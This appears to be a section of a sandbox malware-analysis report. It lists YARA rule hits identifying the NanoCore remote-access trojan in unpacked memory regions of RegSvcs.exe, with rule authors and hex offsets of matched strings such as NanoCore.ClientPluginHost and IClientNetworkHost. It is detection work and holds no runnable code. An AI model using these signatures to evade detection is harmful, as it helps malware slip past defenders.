13.2.RegSvcs.exe.7b34c9f.30.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1a513:$x2: NanoCore.ClientPlugin 0x1a53c:$x3: NanoCore.ClientPluginHost 0x1a504:$i3: IClientNetwork 0x1a529:$i6: IClientLoggingHost 0x1a556:$i7: IClientNetworkHost 0x1a569:$i8: IClientUIHost 0x1a273:$s1: ClientPlugin 0x1a51c:$s1: ClientPlugin
13.2.RegSvcs.exe.7b34c9f.30.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1a53c:$a1: NanoCore.ClientPluginHost 0x1a513:$a2: NanoCore.ClientPlugin 0x1f567:$b7: LogClientException 0x1a529:$b9: IClientLoggingHost
13.2.RegSvcs.exe.3850378.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14ded:$x1: NanoCore.ClientPluginHost 0x21f67:$x1: NanoCore.ClientPluginHost 0x2bdc7:$x1: NanoCore.ClientPluginHost 0x33cfd:$x1: NanoCore.ClientPluginHost 0x39ce0:$x1: NanoCore.ClientPluginHost 0x4375b:$x1: NanoCore.ClientPluginHost 0x4db97:$x1: NanoCore.ClientPluginHost 0x58b89:$x1: NanoCore.ClientPluginHost 0x6493f:$x1: NanoCore.ClientPluginHost 0x70696:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14e1a:$x2: IClientNetworkHost 0x21fa0:$x2: IClientNetworkHost 0x2be00:$x2: IClientNetworkHost 0x33d36:$x2: IClientNetworkHost 0x438b8:$x2: IClientNetworkHost 0x4dbd0:$x2: IClientNetworkHost 0x58ba3:$x2: IClientNetworkHost 0x64959:$x2: IClientNetworkHost 0x706d3:$x2: IClientNetworkHost
13.2.RegSvcs.exe.3850378.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x4bbb:$x2: NanoCore.ClientPluginHost 0x14ded:$x2: NanoCore.ClientPluginHost 0x21f67:$x2: NanoCore.ClientPluginHost 0x2bdc7:$x2: NanoCore.ClientPluginHost 0x33cfd:$x2: NanoCore.ClientPluginHost 0x39ce0:$x2: NanoCore.ClientPluginHost 0x4375b:$x2: NanoCore.ClientPluginHost 0x4db97:$x2: NanoCore.ClientPluginHost 0x58b89:$x2: NanoCore.ClientPluginHost 0x6493f:$x2: NanoCore.ClientPluginHost 0x70696:$x2: NanoCore.ClientPluginHost 0x15dbc:$s2: FileCommand 0x446b1:$s3: PipeExists 0x6a6b:$s4: PipeCreated 0x1a7be:$s4: PipeCreated 0x22084:$s4: PipeCreated 0x2becb:$s4: PipeCreated 0x33e18:$s4: PipeCreated 0x39dbe:$s4: PipeCreated 0x43951:$s4: PipeCreated 0x4dce2:$s4: PipeCreated
13.2.RegSvcs.exe.3850378.3.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x4b96:$x2: NanoCore.ClientPlugin 0x14dc7:$x2: NanoCore.ClientPlugin 0x21fe3:$x2: NanoCore.ClientPlugin 0x2be43:$x2: NanoCore.ClientPlugin 0x33d77:$x2: NanoCore.ClientPlugin 0x39d2a:$x2: NanoCore.ClientPlugin 0x43845:$x2: NanoCore.ClientPlugin 0x4dc37:$x2: NanoCore.ClientPlugin 0x58b60:$x2: NanoCore.ClientPlugin 0x64916:$x2: NanoCore.ClientPlugin 0x70671:$x2: NanoCore.ClientPlugin 0x4bbb:$x3: NanoCore.ClientPluginHost 0x14ded:$x3: NanoCore.ClientPluginHost 0x21f67:$x3: NanoCore.ClientPluginHost 0x2bdc7:$x3: NanoCore.ClientPluginHost 0x33cfd:$x3: NanoCore.ClientPluginHost 0x39ce0:$x3: NanoCore.ClientPluginHost 0x4375b:$x3: NanoCore.ClientPluginHost 0x4db97:$x3: NanoCore.ClientPluginHost 0x58b89:$x3: NanoCore.ClientPluginHost 0x6493f:$x3: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.3850378.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14dc7:$a: NanoCore 0x14ded:$a: NanoCore 0x14e49:$a: NanoCore 0x21caf:$a: NanoCore 0x21d08:$a: NanoCore 0x21d3b:$a: NanoCore 0x21f67:$a: NanoCore 0x21fe3:$a: NanoCore 0x225fc:$a: NanoCore 0x22745:$a: NanoCore 0x22c19:$a: NanoCore 0x22f00:$a: NanoCore 0x22f17:$a: NanoCore 0x2bdc7:$a: NanoCore 0x2be43:$a: NanoCore 0x2e726:$a: NanoCore 0x33cfd:$a: NanoCore 0x33d77:$a: NanoCore
13.2.RegSvcs.exe.37f9244.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1646:$x1: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.37f9244.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x1646:$x2: NanoCore.ClientPluginHost 0x1724:$s4: PipeCreated 0x1660:$s5: IClientLoggingHost
13.2.RegSvcs.exe.3850378.3.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x4bbb:$a1: NanoCore.ClientPluginHost 0x14ded:$a1: NanoCore.ClientPluginHost 0x21f67:$a1: NanoCore.ClientPluginHost 0x2bdc7:$a1: NanoCore.ClientPluginHost 0x33cfd:$a1: NanoCore.ClientPluginHost 0x39ce0:$a1: NanoCore.ClientPluginHost 0x4375b:$a1: NanoCore.ClientPluginHost 0x4db97:$a1: NanoCore.ClientPluginHost 0x58b89:$a1: NanoCore.ClientPluginHost 0x6493f:$a1: NanoCore.ClientPluginHost 0x70696:$a1: NanoCore.ClientPluginHost 0x4b96:$a2: NanoCore.ClientPlugin 0x14dc7:$a2: NanoCore.ClientPlugin 0x21fe3:$a2: NanoCore.ClientPlugin 0x2be43:$a2: NanoCore.ClientPlugin 0x33d77:$a2: NanoCore.ClientPlugin 0x39d2a:$a2: NanoCore.ClientPlugin 0x43845:$a2: NanoCore.ClientPlugin 0x4dc37:$a2: NanoCore.ClientPlugin 0x58b60:$a2: NanoCore.ClientPlugin 0x64916:$a2: NanoCore.ClientPlugin
13.2.RegSvcs.exe.37f9244.5.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1690:$x2: NanoCore.ClientPlugin 0x1646:$x3: NanoCore.ClientPluginHost 0x16a6:$i3: IClientNetwork 0x1660:$i6: IClientLoggingHost 0x13df:$s1: ClientPlugin 0x1699:$s1: ClientPlugin
13.2.RegSvcs.exe.37f9244.5.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1646:$a1: NanoCore.ClientPluginHost 0x1690:$a2: NanoCore.ClientPlugin 0x1660:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7b30000.29.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7b30000.29.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x1d3db:$x2: NanoCore.ClientPluginHost 0x20718:$s4: PipeCreated 0x1d3c8:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7b30000.29.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1d3b2:$x2: NanoCore.ClientPlugin 0x1d3db:$x3: NanoCore.ClientPluginHost 0x1d3a3:$i3: IClientNetwork 0x1d3c8:$i6: IClientLoggingHost 0x1d3f5:$i7: IClientNetworkHost 0x1d408:$i8: IClientUIHost 0x1d112:$s1: ClientPlugin 0x1d3bb:$s1: ClientPlugin
13.2.RegSvcs.exe.7b30000.29.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1d3db:$a1: NanoCore.ClientPluginHost 0x1d3b2:$a2: NanoCore.ClientPlugin 0x22406:$b7: LogClientException 0x1d3c8:$b9: IClientLoggingHost
13.2.RegSvcs.exe.4977af2.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe75:$x1: NanoCore.ClientPluginHost 0x6483:$x1: NanoCore.ClientPluginHost 0x1a020:$x1: NanoCore.ClientPluginHost 0x27c5a:$x1: NanoCore.ClientPluginHost 0x37e76:$x1: NanoCore.ClientPluginHost 0x44fdf:$x1: NanoCore.ClientPluginHost 0x4b52d:$x1: NanoCore.ClientPluginHost 0x514fe:$x1: NanoCore.ClientPluginHost 0x5af6a:$x1: NanoCore.ClientPluginHost 0x65395:$x1: NanoCore.ClientPluginHost 0x70372:$x1: NanoCore.ClientPluginHost 0x7c114:$x1: NanoCore.ClientPluginHost 0xa1018:$x1: NanoCore.ClientPluginHost 0xb0458:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x1a04d:$x2: IClientNetworkHost 0x27c84:$x2: IClientNetworkHost 0x37ea3:$x2: IClientNetworkHost 0x45018:$x2: IClientNetworkHost 0x4b566:$x2: IClientNetworkHost 0x5b0c7:$x2: IClientNetworkHost
13.2.RegSvcs.exe.4977af2.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.4977af2.8.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0x64cd:$x2: NanoCore.ClientPlugin 0x19feb:$x2: NanoCore.ClientPlugin 0x27c35:$x2: NanoCore.ClientPlugin 0x37e50:$x2: NanoCore.ClientPlugin 0x4505b:$x2: NanoCore.ClientPlugin 0x4b5a7:$x2: NanoCore.ClientPlugin 0x51548:$x2: NanoCore.ClientPlugin 0x5b054:$x2: NanoCore.ClientPlugin 0x65435:$x2: NanoCore.ClientPlugin 0x70349:$x2: NanoCore.ClientPlugin 0x7c0eb:$x2: NanoCore.ClientPlugin 0xa0fef:$x2: NanoCore.ClientPlugin 0xb0433:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0x6483:$x3: NanoCore.ClientPluginHost 0x1a020:$x3: NanoCore.ClientPluginHost 0x27c5a:$x3: NanoCore.ClientPluginHost 0x37e76:$x3: NanoCore.ClientPluginHost 0x44fdf:$x3: NanoCore.ClientPluginHost 0x4b52d:$x3: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.4977af2.8.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x6483:$a: NanoCore 0x64cd:$a: NanoCore 0x66b7:$a: NanoCore 0x19fd6:$a: NanoCore 0x19feb:$a: NanoCore 0x1a020:$a: NanoCore 0x27c35:$a: NanoCore 0x27c5a:$a: NanoCore 0x27cb3:$a: NanoCore 0x37e50:$a: NanoCore 0x37e76:$a: NanoCore 0x37ed2:$a: NanoCore 0x44d27:$a: NanoCore 0x44d80:$a: NanoCore 0x44db3:$a: NanoCore 0x44fdf:$a: NanoCore 0x4505b:$a: NanoCore
13.2.RegSvcs.exe.4977af2.8.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0x6483:$a1: NanoCore.ClientPluginHost 0x1a020:$a1: NanoCore.ClientPluginHost 0x27c5a:$a1: NanoCore.ClientPluginHost 0x37e76:$a1: NanoCore.ClientPluginHost 0x44fdf:$a1: NanoCore.ClientPluginHost 0x4b52d:$a1: NanoCore.ClientPluginHost 0x514fe:$a1: NanoCore.ClientPluginHost 0x5af6a:$a1: NanoCore.ClientPluginHost 0x65395:$a1: NanoCore.ClientPluginHost 0x70372:$a1: NanoCore.ClientPluginHost 0x7c114:$a1: NanoCore.ClientPluginHost 0xa1018:$a1: NanoCore.ClientPluginHost 0xb0458:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x64cd:$a2: NanoCore.ClientPlugin 0x19feb:$a2: NanoCore.ClientPlugin 0x27c35:$a2: NanoCore.ClientPlugin 0x37e50:$a2: NanoCore.ClientPlugin 0x4505b:$a2: NanoCore.ClientPlugin 0x4b5a7:$a2: NanoCore.ClientPlugin
13.2.RegSvcs.exe.4b0f50d.12.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x8b7f:$x2: NanoCore.ClientPlugin 0x15d8c:$x2: NanoCore.ClientPlugin 0x1fbe0:$x2: NanoCore.ClientPlugin 0x27b06:$x2: NanoCore.ClientPlugin 0x2daa9:$x2: NanoCore.ClientPlugin 0x375b7:$x2: NanoCore.ClientPlugin 0x4199a:$x2: NanoCore.ClientPlugin 0x4c8b0:$x2: NanoCore.ClientPlugin 0x58654:$x2: NanoCore.ClientPlugin 0x7d55a:$x2: NanoCore.ClientPlugin 0x8c9a0:$x2: NanoCore.ClientPlugin 0xb3fa5:$x2: NanoCore.ClientPlugin 0x10e96d:$x2: NanoCore.ClientPlugin 0x118479:$x2: NanoCore.ClientPlugin 0x12285a:$x2: NanoCore.ClientPlugin 0x12d76e:$x2: NanoCore.ClientPlugin 0x139510:$x2: NanoCore.ClientPlugin 0x15e414:$x2: NanoCore.ClientPlugin 0x16d858:$x2: NanoCore.ClientPlugin 0x8ba5:$x3: NanoCore.ClientPluginHost 0x15d10:$x3: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.4b0f50d.12.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a58:$a: NanoCore 0x15ab1:$a: NanoCore 0x15ae4:$a: NanoCore 0x15d10:$a: NanoCore 0x15d8c:$a: NanoCore 0x163a5:$a: NanoCore 0x164ee:$a: NanoCore 0x169c2:$a: NanoCore 0x16ca9:$a: NanoCore 0x16cc0:$a: NanoCore 0x1fb64:$a: NanoCore 0x1fbe0:$a: NanoCore 0x224c3:$a: NanoCore 0x27a8c:$a: NanoCore 0x27b06:$a: NanoCore 0x2c6a3:$a: NanoCore 0x2da5f:$a: NanoCore 0x2daa9:$a: NanoCore
13.2.RegSvcs.exe.4b0f50d.12.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x8ba5:$a1: NanoCore.ClientPluginHost 0x15d10:$a1: NanoCore.ClientPluginHost 0x1fb64:$a1: NanoCore.ClientPluginHost 0x27a8c:$a1: NanoCore.ClientPluginHost 0x2da5f:$a1: NanoCore.ClientPluginHost 0x374cd:$a1: NanoCore.ClientPluginHost 0x418fa:$a1: NanoCore.ClientPluginHost 0x4c8d9:$a1: NanoCore.ClientPluginHost 0x5867d:$a1: NanoCore.ClientPluginHost 0x7d583:$a1: NanoCore.ClientPluginHost 0x8c9c5:$a1: NanoCore.ClientPluginHost 0xb3fce:$a1: NanoCore.ClientPluginHost 0x10e923:$a1: NanoCore.ClientPluginHost 0x11838f:$a1: NanoCore.ClientPluginHost 0x1227ba:$a1: NanoCore.ClientPluginHost 0x12d797:$a1: NanoCore.ClientPluginHost 0x139539:$a1: NanoCore.ClientPluginHost 0x15e43d:$a1: NanoCore.ClientPluginHost 0x16d87d:$a1: NanoCore.ClientPluginHost 0x8b7f:$a2: NanoCore.ClientPlugin 0x15d8c:$a2: NanoCore.ClientPlugin
13.2.RegSvcs.exe.385c5c0.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d1f:$x1: NanoCore.ClientPluginHost 0x1fb7f:$x1: NanoCore.ClientPluginHost 0x27ab5:$x1: NanoCore.ClientPluginHost 0x2da98:$x1: NanoCore.ClientPluginHost 0x37513:$x1: NanoCore.ClientPluginHost 0x4194f:$x1: NanoCore.ClientPluginHost 0x4c941:$x1: NanoCore.ClientPluginHost 0x586f7:$x1: NanoCore.ClientPluginHost 0x6444e:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d58:$x2: IClientNetworkHost 0x1fbb8:$x2: IClientNetworkHost 0x27aee:$x2: IClientNetworkHost 0x37670:$x2: IClientNetworkHost 0x41988:$x2: IClientNetworkHost 0x4c95b:$x2: IClientNetworkHost 0x58711:$x2: IClientNetworkHost 0x6448b:$x2: IClientNetworkHost
13.2.RegSvcs.exe.385c5c0.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x8ba5:$x2: NanoCore.ClientPluginHost 0x15d1f:$x2: NanoCore.ClientPluginHost 0x1fb7f:$x2: NanoCore.ClientPluginHost 0x27ab5:$x2: NanoCore.ClientPluginHost 0x2da98:$x2: NanoCore.ClientPluginHost 0x37513:$x2: NanoCore.ClientPluginHost 0x4194f:$x2: NanoCore.ClientPluginHost 0x4c941:$x2: NanoCore.ClientPluginHost 0x586f7:$x2: NanoCore.ClientPluginHost 0x6444e:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0x38469:$s3: PipeExists 0xe576:$s4: PipeCreated 0x15e3c:$s4: PipeCreated 0x1fc83:$s4: PipeCreated 0x27bd0:$s4: PipeCreated 0x2db76:$s4: PipeCreated 0x37709:$s4: PipeCreated 0x41a9a:$s4: PipeCreated 0x4d976:$s4: PipeCreated 0x5a4a2:$s4: PipeCreated
13.2.RegSvcs.exe.385c5c0.4.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x8b7f:$x2: NanoCore.ClientPlugin 0x15d9b:$x2: NanoCore.ClientPlugin 0x1fbfb:$x2: NanoCore.ClientPlugin 0x27b2f:$x2: NanoCore.ClientPlugin 0x2dae2:$x2: NanoCore.ClientPlugin 0x375fd:$x2: NanoCore.ClientPlugin 0x419ef:$x2: NanoCore.ClientPlugin 0x4c918:$x2: NanoCore.ClientPlugin 0x586ce:$x2: NanoCore.ClientPlugin 0x64429:$x2: NanoCore.ClientPlugin 0x8ba5:$x3: NanoCore.ClientPluginHost 0x15d1f:$x3: NanoCore.ClientPluginHost 0x1fb7f:$x3: NanoCore.ClientPluginHost 0x27ab5:$x3: NanoCore.ClientPluginHost 0x2da98:$x3: NanoCore.ClientPluginHost 0x37513:$x3: NanoCore.ClientPluginHost 0x4194f:$x3: NanoCore.ClientPluginHost 0x4c941:$x3: NanoCore.ClientPluginHost 0x586f7:$x3: NanoCore.ClientPluginHost 0x6444e:$x3: NanoCore.ClientPluginHost 0x8b70:$i3: IClientNetwork
13.2.RegSvcs.exe.385c5c0.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a67:$a: NanoCore 0x15ac0:$a: NanoCore 0x15af3:$a: NanoCore 0x15d1f:$a: NanoCore 0x15d9b:$a: NanoCore 0x163b4:$a: NanoCore 0x164fd:$a: NanoCore 0x169d1:$a: NanoCore 0x16cb8:$a: NanoCore 0x16ccf:$a: NanoCore 0x1fb7f:$a: NanoCore 0x1fbfb:$a: NanoCore 0x224de:$a: NanoCore 0x27ab5:$a: NanoCore 0x27b2f:$a: NanoCore 0x2da98:$a: NanoCore 0x2dae2:$a: NanoCore 0x2e73c:$a: NanoCore
13.2.RegSvcs.exe.385c5c0.4.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x8ba5:$a1: NanoCore.ClientPluginHost 0x15d1f:$a1: NanoCore.ClientPluginHost 0x1fb7f:$a1: NanoCore.ClientPluginHost 0x27ab5:$a1: NanoCore.ClientPluginHost 0x2da98:$a1: NanoCore.ClientPluginHost 0x37513:$a1: NanoCore.ClientPluginHost 0x4194f:$a1: NanoCore.ClientPluginHost 0x4c941:$a1: NanoCore.ClientPluginHost 0x586f7:$a1: NanoCore.ClientPluginHost 0x6444e:$a1: NanoCore.ClientPluginHost 0x8b7f:$a2: NanoCore.ClientPlugin 0x15d9b:$a2: NanoCore.ClientPlugin 0x1fbfb:$a2: NanoCore.ClientPlugin 0x27b2f:$a2: NanoCore.ClientPlugin 0x2dae2:$a2: NanoCore.ClientPlugin 0x375fd:$a2: NanoCore.ClientPlugin 0x419ef:$a2: NanoCore.ClientPlugin 0x4c918:$a2: NanoCore.ClientPlugin 0x586ce:$a2: NanoCore.ClientPlugin 0x64429:$a2: NanoCore.ClientPlugin 0x6443f:$b4: IClientAppHost
13.2.RegSvcs.exe.4b032d9.9.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x4b96:$x2: NanoCore.ClientPlugin 0x14db3:$x2: NanoCore.ClientPlugin 0x21fc0:$x2: NanoCore.ClientPlugin 0x2be14:$x2: NanoCore.ClientPlugin 0x33d3a:$x2: NanoCore.ClientPlugin 0x39cdd:$x2: NanoCore.ClientPlugin 0x437eb:$x2: NanoCore.ClientPlugin 0x4dbce:$x2: NanoCore.ClientPlugin 0x58ae4:$x2: NanoCore.ClientPlugin 0x64888:$x2: NanoCore.ClientPlugin 0x8978e:$x2: NanoCore.ClientPlugin 0x98bd4:$x2: NanoCore.ClientPlugin 0xc01d9:$x2: NanoCore.ClientPlugin 0x11aba1:$x2: NanoCore.ClientPlugin 0x1246ad:$x2: NanoCore.ClientPlugin 0x12ea8e:$x2: NanoCore.ClientPlugin 0x1399a2:$x2: NanoCore.ClientPlugin 0x145744:$x2: NanoCore.ClientPlugin 0x16a648:$x2: NanoCore.ClientPlugin 0x179a8c:$x2: NanoCore.ClientPlugin 0x4bbb:$x3: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.4b032d9.9.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14db3:$a: NanoCore 0x14dd9:$a: NanoCore 0x14e35:$a: NanoCore 0x21c8c:$a: NanoCore 0x21ce5:$a: NanoCore 0x21d18:$a: NanoCore 0x21f44:$a: NanoCore 0x21fc0:$a: NanoCore 0x225d9:$a: NanoCore 0x22722:$a: NanoCore 0x22bf6:$a: NanoCore 0x22edd:$a: NanoCore 0x22ef4:$a: NanoCore 0x2bd98:$a: NanoCore 0x2be14:$a: NanoCore 0x2e6f7:$a: NanoCore 0x33cc0:$a: NanoCore 0x33d3a:$a: NanoCore
13.2.RegSvcs.exe.4b032d9.9.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x4bbb:$a1: NanoCore.ClientPluginHost 0x14dd9:$a1: NanoCore.ClientPluginHost 0x21f44:$a1: NanoCore.ClientPluginHost 0x2bd98:$a1: NanoCore.ClientPluginHost 0x33cc0:$a1: NanoCore.ClientPluginHost 0x39c93:$a1: NanoCore.ClientPluginHost 0x43701:$a1: NanoCore.ClientPluginHost 0x4db2e:$a1: NanoCore.ClientPluginHost 0x58b0d:$a1: NanoCore.ClientPluginHost 0x648b1:$a1: NanoCore.ClientPluginHost 0x897b7:$a1: NanoCore.ClientPluginHost 0x98bf9:$a1: NanoCore.ClientPluginHost 0xc0202:$a1: NanoCore.ClientPluginHost 0x11ab57:$a1: NanoCore.ClientPluginHost 0x1245c3:$a1: NanoCore.ClientPluginHost 0x12e9ee:$a1: NanoCore.ClientPluginHost 0x1399cb:$a1: NanoCore.ClientPluginHost 0x14576d:$a1: NanoCore.ClientPluginHost 0x16a671:$a1: NanoCore.ClientPluginHost 0x179ab1:$a1: NanoCore.ClientPluginHost 0x4b96:$a2: NanoCore.ClientPlugin
13.2.RegSvcs.exe.497c92f.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1646:$x1: NanoCore.ClientPluginHost 0x151e3:$x1: NanoCore.ClientPluginHost 0x22e1d:$x1: NanoCore.ClientPluginHost 0x33039:$x1: NanoCore.ClientPluginHost 0x401a2:$x1: NanoCore.ClientPluginHost 0x466f0:$x1: NanoCore.ClientPluginHost 0x4c6c1:$x1: NanoCore.ClientPluginHost 0x5612d:$x1: NanoCore.ClientPluginHost 0x60558:$x1: NanoCore.ClientPluginHost 0x6b535:$x1: NanoCore.ClientPluginHost 0x772d7:$x1: NanoCore.ClientPluginHost 0x9c1db:$x1: NanoCore.ClientPluginHost 0xab61b:$x1: NanoCore.ClientPluginHost 0x15210:$x2: IClientNetworkHost 0x22e47:$x2: IClientNetworkHost 0x33066:$x2: IClientNetworkHost 0x401db:$x2: IClientNetworkHost 0x46729:$x2: IClientNetworkHost 0x5628a:$x2: IClientNetworkHost 0x60591:$x2: IClientNetworkHost 0x6b54f:$x2: IClientNetworkHost
13.2.RegSvcs.exe.497c92f.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.497c92f.7.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1690:$x2: NanoCore.ClientPlugin 0x151ae:$x2: NanoCore.ClientPlugin 0x22df8:$x2: NanoCore.ClientPlugin 0x33013:$x2: NanoCore.ClientPlugin 0x4021e:$x2: NanoCore.ClientPlugin 0x4676a:$x2: NanoCore.ClientPlugin 0x4c70b:$x2: NanoCore.ClientPlugin 0x56217:$x2: NanoCore.ClientPlugin 0x605f8:$x2: NanoCore.ClientPlugin 0x6b50c:$x2: NanoCore.ClientPlugin 0x772ae:$x2: NanoCore.ClientPlugin 0x9c1b2:$x2: NanoCore.ClientPlugin 0xab5f6:$x2: NanoCore.ClientPlugin 0x1646:$x3: NanoCore.ClientPluginHost 0x151e3:$x3: NanoCore.ClientPluginHost 0x22e1d:$x3: NanoCore.ClientPluginHost 0x33039:$x3: NanoCore.ClientPluginHost 0x401a2:$x3: NanoCore.ClientPluginHost 0x466f0:$x3: NanoCore.ClientPluginHost 0x4c6c1:$x3: NanoCore.ClientPluginHost 0x5612d:$x3: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.497c92f.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1646:$a: NanoCore 0x1690:$a: NanoCore 0x187a:$a: NanoCore 0x15199:$a: NanoCore 0x151ae:$a: NanoCore 0x151e3:$a: NanoCore 0x22df8:$a: NanoCore 0x22e1d:$a: NanoCore 0x22e76:$a: NanoCore 0x33013:$a: NanoCore 0x33039:$a: NanoCore 0x33095:$a: NanoCore 0x3feea:$a: NanoCore 0x3ff43:$a: NanoCore 0x3ff76:$a: NanoCore 0x401a2:$a: NanoCore 0x4021e:$a: NanoCore 0x40837:$a: NanoCore 0x40980:$a: NanoCore 0x40e54:$a: NanoCore 0x4113b:$a: NanoCore
13.2.RegSvcs.exe.497c92f.7.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1646:$a1: NanoCore.ClientPluginHost 0x151e3:$a1: NanoCore.ClientPluginHost 0x22e1d:$a1: NanoCore.ClientPluginHost 0x33039:$a1: NanoCore.ClientPluginHost 0x401a2:$a1: NanoCore.ClientPluginHost 0x466f0:$a1: NanoCore.ClientPluginHost 0x4c6c1:$a1: NanoCore.ClientPluginHost 0x5612d:$a1: NanoCore.ClientPluginHost 0x60558:$a1: NanoCore.ClientPluginHost 0x6b535:$a1: NanoCore.ClientPluginHost 0x772d7:$a1: NanoCore.ClientPluginHost 0x9c1db:$a1: NanoCore.ClientPluginHost 0xab61b:$a1: NanoCore.ClientPluginHost 0x1690:$a2: NanoCore.ClientPlugin 0x151ae:$a2: NanoCore.ClientPlugin 0x22df8:$a2: NanoCore.ClientPlugin 0x33013:$a2: NanoCore.ClientPlugin 0x4021e:$a2: NanoCore.ClientPlugin 0x4676a:$a2: NanoCore.ClientPlugin 0x4c70b:$a2: NanoCore.ClientPlugin 0x56217:$a2: NanoCore.ClientPlugin
13.2.RegSvcs.exe.4982365.11.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xf7ad:$x1: NanoCore.ClientPluginHost 0x1d3e7:$x1: NanoCore.ClientPluginHost 0x2d603:$x1: NanoCore.ClientPluginHost 0x3a76c:$x1: NanoCore.ClientPluginHost 0x40cba:$x1: NanoCore.ClientPluginHost 0x46c8b:$x1: NanoCore.ClientPluginHost 0x506f7:$x1: NanoCore.ClientPluginHost 0x5ab22:$x1: NanoCore.ClientPluginHost 0x65aff:$x1: NanoCore.ClientPluginHost 0x718a1:$x1: NanoCore.ClientPluginHost 0x967a5:$x1: NanoCore.ClientPluginHost 0xa5be5:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x1d411:$x2: IClientNetworkHost 0x2d630:$x2: IClientNetworkHost 0x3a7a5:$x2: IClientNetworkHost 0x40cf3:$x2: IClientNetworkHost 0x50854:$x2: IClientNetworkHost 0x5ab5b:$x2: IClientNetworkHost 0x65b19:$x2: IClientNetworkHost 0x718bb:$x2: IClientNetworkHost
13.2.RegSvcs.exe.4982365.11.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
